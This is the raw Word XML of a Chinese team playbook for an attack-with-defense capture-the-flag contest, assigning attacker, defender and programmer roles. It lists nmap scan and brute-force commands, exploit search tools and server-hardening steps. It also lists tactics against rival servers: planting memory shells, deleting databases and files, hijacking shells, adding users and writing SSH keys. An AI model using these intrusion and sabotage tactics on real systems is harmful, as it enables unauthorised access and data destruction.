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467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="0" w:name="2870-1541221558266"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>理想队伍分工：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="1" w:name="7617-1541312399122"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>攻击手（熟悉web漏洞，会代码审计）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="2" w:name="9994-1541312325724"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>防御手（熟悉运维知识，linux配置，waf，数据库）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="3" w:name="5178-1541312325724"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>编程手（前期关注官方消息，有组织领导能力，熟悉py编程，快速编写代码）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="4" w:name="4297-1541312449024"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="5" w:name="4248-1541312423878"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击手（熟悉web漏洞，会代码审计）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="6" w:name="6238-1541312432957"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t>##################################################################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="7" w:name="2642-1541312424792"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t>1.页面登录账户密码弱口令,修改自己的，迅速修改他人的密码，自己和别人的密码的最好不要相同）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="8" w:name="3037-1541312819832"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>发现可以修改弱密码后，和编程手一起</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="9" w:name="5779-1541312325724"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>2.确认web的容器与脚本信息，有没有一些流行的CMS框架，这些CMS是否有公开的漏洞？是否能getshell？利用？（火狐插件+百度）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="10" w:name="4580-1541312621110"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>a.未知其他人端口与ip要迅速扫描,主机发现（nmap，扫描脚本，扫描软件）确定了对方的ip+端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="11" w:name="5687-1541312621110"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t>nmap扫描端口使和用对应的一些脚本进行扫描</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="12" w:name="9971-1541312621110"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t>nmap -T5 -A  //全面而快速的扫描</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="13" w:name="1964-1541312621110"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:t>nmap --script=vuln //扫描一些常规的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="14" w:name="4094-1541312621110"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:t>nmap --script=brute  //对一些服务进行弱口令爆破</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="15" w:name="5834-1541312621110"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:t>nmap -sC //，主要是搜集各种应用服务的信息，收集到后，可再针对具体服务进行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="16" w:name="3029-1541312621110"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:t>nmap --script http* //对http进行扫描</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="17" w:name="1716-1541313065642"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="18" w:name="2157-1541312621110"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>b.黑盒寻找页面上的漏洞，注入，上传。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="19" w:name="4347-1541312621110"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:t>c.对一些中间件进行漏洞搜索利用：searchsploit FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="20" w:name="8219-1541312621110"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:t>d.对一些服务进行爆破，hydra，metasploit 包括 md5、爆破随机数、验证码识别等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="21" w:name="4017-1541313052589"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="22" w:name="7059-1541246953833"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>黑盒找不到思路，接到防御手的源码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="23" w:name="0019-1541312658903"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:t>f.代码审计</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="24" w:name="1020-1541312659221"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:t>sql注入文件读取 写shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="25" w:name="4865-1541312659221"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:t>反序列化导致代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="26" w:name="3052-1541312659221"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:t>命令执行 代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="27" w:name="8632-1541312659221"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:t>文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="28" w:name="5588-1541312659221"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:t>SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="29" w:name="5531-1541312659221"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:t>文件上传等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="30" w:name="3156-1541312659221"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:t>几乎所有能够导致文件读取、远程访问flag的漏洞都会涉及到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="31" w:name="7971-1541312659221"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:t>要求我们提高自己的代码审计能力在比赛有限的时间里能够快速发现相关漏洞给自己打上补丁并进行批量利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="32" w:name="5768-1541246902515"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>防御手（熟悉运维知识，linux配置，waf，数据库）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="33" w:name="9034-1541312477268"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:t>##################################################################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="34" w:name="2686-1541312502462"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:t>初始SSH密码相同（同攻击，修改密码）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="35" w:name="5087-1541312556875"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:t>登上ssh后关注弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="36" w:name="7060-1541312556875"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:t>ftp mysql ssh等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="37" w:name="3023-1541312556875"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:t>注意发现和修改利用ssh ftp mysql默认密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="38" w:name="4390-1541312756525"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>发现可以修改弱密码后，和编程手一起</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="39" w:name="2088-1541312637395"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:t>a.备份Web目录 备份数据库(/var/www/html)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="40" w:name="6552-1541312747201"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:t>比赛开始后第一时间备份服务器中web目录下的文件和数据库，这是自我审计的基础，也是防止服务器在比赛中出现异常的情况下可以立即恢复到初始状态的先决条件。有的比赛可以提供恢复初始设置的机会，有的比赛不提供，所以备份十分重要。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="41" w:name="7358-1541312747201"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="42" w:name="2840-1541312747201"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:t>b.修改配置文件，删除不必要的服务，命令别名防御(更改命令的名字)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="43" w:name="8356-1541312747201"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:t>rsync samba redis rlogin nfs 中间件等，防御添加认证或者直接kill存在漏洞的进程（如果有权限的话）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="44" w:name="3913-1541312747201"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:t>mysql关闭远程访问，收回mysql用户的file权限防止mysql写shell和读取文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="45" w:name="7086-1541312747201"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:t>关闭crontab服务 防止被写计划任务（如果有权限的话）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="46" w:name="3413-1541312747201"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:t>检查.ssh目录 注意是否被写入公钥</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="47" w:name="4064-1541312747201"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r>
        <w:t>修改php apache配置文件 禁止特定函数可以有效防止命令执行代码执行漏洞（有权限的话）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="48" w:name="1021-1541312747201"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:t>关闭远程文件包含 设定包含范围 防止文件包含漏洞读取flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="49" w:name="3917-1541312747201"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:t>禁用掉相关协议 防止SSRF攻击扩大化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="50" w:name="3743-1541312747201"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:t>d.注意/etc/passwd 发现可疑用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="51" w:name="3035-1541312747201"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:t>e.上waf,查log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="52" w:name="5652-1541312747201"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:t>(Waf可以有效阻断各种Web攻击行为，Log日志记录可以查看自己被攻击时的攻击流量做到分析加固再利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="53" w:name="9357-1541312747201"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:t>需要注意的是，部署Waf可能会导致服务不可用，需要谨慎部署。)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="54" w:name="4755-1541312747201"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:t>f.搭建进程网络监控，运行访问记录脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="55" w:name="8072-1541312747201"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>随时注意可疑进程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="56" w:name="4566-1541312747201"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r>
        <w:t>熟练使用iptables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="57" w:name="4079-1541312747201"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r>
        <w:t>g.文件监控 权限修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="58" w:name="8751-1541313032830"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:t>chmod chattr等命令修改Web文件权限或者使用文件监控脚本随时注意文件的变化 防止文件上传漏洞同时也要注意保持checker的成功上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="59" w:name="4317-1541313035108"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r>
        <w:t>在文件上传目录进行文件监控，一有文件直接删除，或者将文件上传的目录设置为000权限，chmod -R 000 uploadfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="60" w:name="9098-1541312747201"/>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="61" w:name="2350-1541312747201"/>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="62" w:name="3832-1541312651774"/>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="63" w:name="1562-1541312480480"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>编程手（前期关注官方消息，有组织领导能力，熟悉py编程，快速编写代码）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="64" w:name="5538-1541312477661"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r>
        <w:t>##################################################################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="65" w:name="9642-1541245654233"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r>
        <w:t>a.随时关注官方消息,配合攻击和防御，提高他们的效率</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="66" w:name="6948-1541245980579"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r>
        <w:t>b.拿到源码进行D盾扫描（寻找官方留好的后门）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="67" w:name="6624-1541313098177"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r>
        <w:t>c.系统端口渗透：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用netstat ps命令获取Gamebox上的端口服务开启情况 排除系统端口方面的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="68" w:name="4845-1541313157689"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>d.代码审计，自动化脚本修改，编写（</w:t>
      </w:r>
      <w:r>
        <w:t>做payload的混淆，防止被人流量重放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="69" w:name="5989-1541313177836"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="70" w:name="6035-1541242101853"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r>
        <w:t>一些思路：（如何搅屎）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="71" w:name="3876-1541313299182"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>我方界面：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="72" w:name="7073-1541313412585"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r>
        <w:t xml:space="preserve">1.改为静态页面 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="73" w:name="2577-1541314136362"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.删漏洞页面：大部分举办方还是会明确禁止删除网站的，通常赛组会定期访问网站主页（一般来说），从而确定网站是否正常运行。其实我们没必要删除整个网站，只要删掉有漏洞的页面就行了，比如删后台登录页面、注册页面、上传页面等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="74" w:name="5097-1541314134327"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r>
        <w:t>3. 破坏正常功能：如果明确不能删除任何页面，可以选择让这些漏洞点的功能函数（或者其依赖的功能函数）失效。比如上传点，如果考虑过滤挺麻烦，又不能删页面，那么我们可以找到这个漏洞网页，改掉或者删掉文件里对应的类似upload等这种功能调用函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="75" w:name="4411-1541314134327"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r>
        <w:t>上面这三种其实都算不上修补漏洞了，真实环境下哪能这么干。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="76" w:name="5081-1541314134327"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r>
        <w:t>4. 采用正常修补手段：规则限定很严的情况下，我们还是采用正常手法吧，修改服务配置、安装补丁、下载更新的软件版本、加过滤等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="77" w:name="2020-1541313337075"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>我方服务器：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="78" w:name="2674-1541313414063"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r>
        <w:t>修改文件名，修改命令名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="79" w:name="7085-1541313343447"/>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="80" w:name="9977-1541313328245"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>敌方界面：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="81" w:name="1230-1541313319490"/>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="82" w:name="5428-1541243537307"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>敌方服务器端：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="83" w:name="3533-1541313621386"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r>
        <w:t>内存shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="84" w:name="3040-1541313621838"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r>
        <w:t>shell防骑：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="85" w:name="7995-1541313622999"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r>
        <w:t>1.MD5shell 2.远程ip认证 3.需要配置菜刀客户端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="86" w:name="9276-1541313274767"/>
      <w:bookmarkEnd w:id="86"/>
      <w:r>
        <w:t>删除数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="87" w:name="4667-1541313607161"/>
      <w:bookmarkEnd w:id="87"/>
      <w:r>
        <w:t>删除关键文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="88" w:name="5913-1541313604523"/>
      <w:bookmarkEnd w:id="88"/>
      <w:r>
        <w:t>利用别人shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="89" w:name="9829-1541313604922"/>
      <w:bookmarkEnd w:id="89"/>
      <w:r>
        <w:t>删除对手shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="90" w:name="8290-1541313604922"/>
      <w:bookmarkEnd w:id="90"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>crontab计划任务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="91" w:name="4560-1541313604922"/>
      <w:bookmarkEnd w:id="91"/>
      <w:r>
        <w:t>新建用户（有权限的话）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="92" w:name="4923-1541313604922"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r>
        <w:t>.ssh目录写公钥（有权限的话）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="93" w:name="8370-1541312395110"/>
      <w:bookmarkEnd w:id="93"/>
      <w:r>
        <w:t>假的flag文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="94" w:name="6095-1541314580644"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="95" w:name="8449-1541314580820"/>
      <w:bookmarkEnd w:id="95"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>黑盒的一些思路：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="96" w:name="2680-1541314596905"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r>
        <w:t>1.找CMS的漏洞或一些普遍存在的漏洞，后台弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="97" w:name="1683-1541314599928"/>
      <w:bookmarkEnd w:id="97"/>
      <w:r>
        <w:t>SQL注入，命令注入，任意文件上传，XXE注入，条件竞争，解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="98" w:name="2861-1541314599928"/>
      <w:bookmarkEnd w:id="98"/>
      <w:r>
        <w:t>反序列化漏洞，XSS，文件包含，SSRF，源码泄露，逻辑错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="99" w:name="3063-1541314651852"/>
      <w:bookmarkEnd w:id="99"/>
      <w:r>
        <w:t>2.快速查看目录，是否有信息泄漏，和敏感文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="100" w:name="2620-1541314599928"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="101" w:name="4842-1541314766710"/>
      <w:bookmarkEnd w:id="101"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>权限维持的思路：</w:t>
      </w:r>
    </w:p>
